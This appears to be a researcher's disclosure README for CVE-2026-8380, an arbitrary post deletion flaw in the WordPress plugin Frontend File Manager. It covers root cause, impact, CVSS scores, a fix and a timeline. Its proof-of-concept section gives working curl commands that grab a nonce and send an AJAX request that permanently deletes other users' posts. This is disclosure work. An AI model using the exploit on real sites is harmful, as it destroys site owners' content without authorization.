tiagob0b/CVE-2026-8380

# CVE-2026-8380 # CVE-2026-8380 — Frontend File Manager <= 23.6 Arbitrary Post Deletion ## Overview A critical authorization flaw was identified in the WordPress plugin **Frontend File Manager (nmedia-user-file-uploader)** affecting versions `<= 23.6`. The vulnerability allows authenticated users with low privileges to permanently delete arbitrary WordPress posts, pages, attachments, and custom post types due to improper authorization validation in the AJAX deletion endpoint. When the plugin option `_allow_guest_upload=yes` is enabled, the vulnerability becomes exploitable by unauthenticated attackers. * **CVE:** CVE-2026-8380 * **Plugin:** Frontend File Manager (`nmedia-user-file-uploader`) * **Affected Versions:** <= 23.6 * **Researcher:** Tiago Ferreira * **CWE:** CWE-639 / CWE-862 * **Vulnerability Type:** Arbitrary Post Deletion * **WPScan:** https://wpscan.com/vulnerability/45fcbf74-45be-4cff-a81a-0fea903592a5/ # Executive Summary The plugin contains a critical authorization bypass vulnerability that allows arbitrary deletion of WordPress content through parameter mismatch validation inside the `wpfm_delete_file` AJAX action. The vulnerability was successfully validated in a controlled laboratory environment with active Proof-of-Concept exploitation. Additional security weaknesses were also identified during the research: * CSRF in metadata update endpoints without nonce validation * Extension allowlist bypass based only on the last file extension * `_allow_guest_upload` disabling authorization checks in multiple endpoints * Rate limiting based only on `REMOTE_ADDR` # Vulnerable Endpoint POST /wp-admin/admin-ajax.php?action=wpfm_delete_file ### Affected File inc/files.php ### Vulnerable Code Region // inc/files.php:691 if( !$allow_guest && ! wpfm_is_current_user_post_author($_POST['file_id'] )) { wp_send_json_error(__("Sorry, not allowed", "wpfm")); } // inc/files.php:695 $file_ids = isset($_POST['file_ids']) && is_array($_POST['file_ids']) ? array_map('intval', $_POST['file_ids']) : []; foreach ($file_ids as $file_id) { $file = new WPFM_File($file_id); wp_delete_post($file_id, $bypass_trash); } # Root Cause The authorization check validates ownership using the singular parameter: $_POST['file_id'] However, the actual deletion operation iterates over a different parameter: $_POST['file_ids[]'] Because of this mismatch, an attacker can: 1. Provide a legitimate owned post in `file_id` 2. Inject arbitrary victim post IDs into `file_ids[]` No validation exists to ensure: * ownership of every item in `file_ids[]` * allowed `post_type` * relationship between `file_id` and `file_ids[]` As a result, arbitrary WordPress content can be permanently deleted. # Impact An authenticated user with minimal privileges can permanently delete: * Posts * Pages * Products * Attachments * Custom Post Types * Plugin-specific content The deletion is performed with: wp_delete_post($file_id, true); Meaning content is permanently removed without Trash recovery. If `_allow_guest_upload=yes` is enabled: * exploitation becomes unauthenticated * the author ownership check is entirely skipped # Proof of Concept ## Laboratory Environment * Target: `192.168.1.1:8080` * Attacker Role: Subscriber * Victim Role: Administrator ### Attacker Account wpfm_sub : Sub@Test123 ### Victim Posts Page ID: 60 Post ID: 61 ## Step 1 — Obtain Nonce The attacker visits a page containing the shortcode: [ffmwp] Extract nonce: curl -b sub_cookie http://target/wpfm-test/ | grep wpfm_ajax_nonce Response: value="9c233d4720" ## Step 2 — Trigger Arbitrary Deletion curl -b sub_cookie -X POST http://target/wp-admin/admin-ajax.php \ --data 'action=wpfm_delete_file' \ --data 'wpfm_ajax_nonce=9c233d4720' \ --data 'file_id=57' \ --data 'file_ids[]=60' \ --data 'file_ids[]=61' ### Explanation | Parameter | Description | | --------------- | -------------------------------------------------- | | `file_id=57` | Subscriber-owned post used to bypass authorization | | `file_ids[]=60` | Victim administrator page | | `file_ids[]=61` | Victim administrator post | ## Successful Response { "success": true, "data": { "message": "2 files, directories are removed inside SUB-OWNED" } } ## Verification curl -o /dev/null -w "%{http_code}\n" \ http://target/wp-json/wp/v2/pages/60 404 curl -o /dev/null -w "%{http_code}\n" \ http://target/wp-json/wp/v2/posts/61 404 # Severity ## Authenticated Scenario ### CVSS 3.1 8.1 HIGH AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H ## Guest Upload Enabled Scenario ### CVSS 3.1 9.1 CRITICAL AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H # CWE Classification * CWE-639 — Authorization Bypass Through User-Controlled Key * CWE-862 — Missing Authorization # Recommended Fix Validate ownership and post type for every entry inside `file_ids[]`. Example secure implementation: foreach ($file_ids as $fid) { if ( ! wpfm_is_current_user_post_author($fid) ) { wp_send_json_error(...); } if ( get_post_type($fid) !== 'wpfm-files' ) { wp_send_json_error(...); } } # Timeline | Event | Date | | ------------------------ | ---------- | | Vulnerability Discovered | 2026-05-28 | | Vendor Contacted | 2026-05-28 | | WPScan Published | 2026-06-04 | | Public Disclosure | 2026-06-18 | # References * WPScan Advisory: https://wpscan.com/vulnerability/45fcbf74-45be-4cff-a81a-0fea903592a5/ * CVE: https://www.cve.org/CVERecord?id=CVE-2026-8380 # Disclaimer This research was performed in a controlled laboratory environment for educational and security research purposes only. Do not test systems without proper authorization.